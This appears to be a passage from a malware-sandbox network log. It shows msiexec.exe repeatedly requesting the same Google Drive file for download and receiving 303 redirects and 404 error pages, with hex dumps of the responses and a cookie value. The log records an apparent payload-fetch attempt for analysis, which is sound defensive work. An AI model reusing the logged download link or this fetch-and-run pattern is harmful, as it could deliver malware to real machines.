                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.549979142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:46 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:47 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC5ygf49bG1Yy-djCKExptnIrEJUZIbKGsQ-C8wdn96QFsG7Hk6TgxZ8ZOs-8_cp5jGmvZORzlE
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:46 GMT
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-MPKALXGbfgfF2TlzGL9Yrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 6f 34 4a 6b 31 46 78 4a 43 70 65 74 7a 4e 50 67 70 7a 75 72 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wo4Jk1FxJCpetzNPgpzurw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.549985142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:47 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:48 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:48 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: script-src 'nonce-TfXj6l4WfP8qOkP4mzY5xQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.549995142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:48 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:49 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC7EwYRVBp6qr8onz9Tm_tL8mSzwENjn1lTV_Ms1z6knp4-F-pIdwz8XkwKc2O5wTYgBY52iv7c
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:49 GMT
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-8-q204vIWcp3HGutWJqrmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:49 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 4d 76 48 79 68 64 2d 47 6c 6c 4f 59 35 49 45 76 33 6b 52 6e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JMvHyhd-GllOY5IEv3kRnw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.550002142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:50 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:50 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:50 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-xpKu0iZYWzNNyE5Y276vxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.550003142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:51 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:51 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC5kzkOfdAfu5FCjSl-h6bQoB_VItSn9XKsKAYtmr9ZhSvBtBS-8m98JIkOQLFszKO1f5zrIRhg
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:51 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-pnZPxG0TTaJ4s0ppOUnYZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:51 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 62 41 6a 62 72 6d 41 47 68 47 52 75 6f 4e 41 64 41 38 73 65 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MbAjbrmAGhGRuoNAdA8sew">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.550004142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:52 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:52 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:52 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: script-src 'nonce-zYzPR4e5zAcPUyYwvD004Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.550005142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:53 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:54 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgT1336Dzzv5lecgHyhQMm_wJ-M8szZ2lg_9xVqyCggiiR3TDgWiCsUBUc0FSMq2P7dc
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:54 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-uVFNRGEZeU1FJmar2Pt8fQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:54 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 59 63 72 59 33 6c 72 30 50 4f 32 7a 72 56 4d 67 36 63 30 65 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tYcrY3lr0PO2zrVMg6c0ew">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.550006142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:54 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
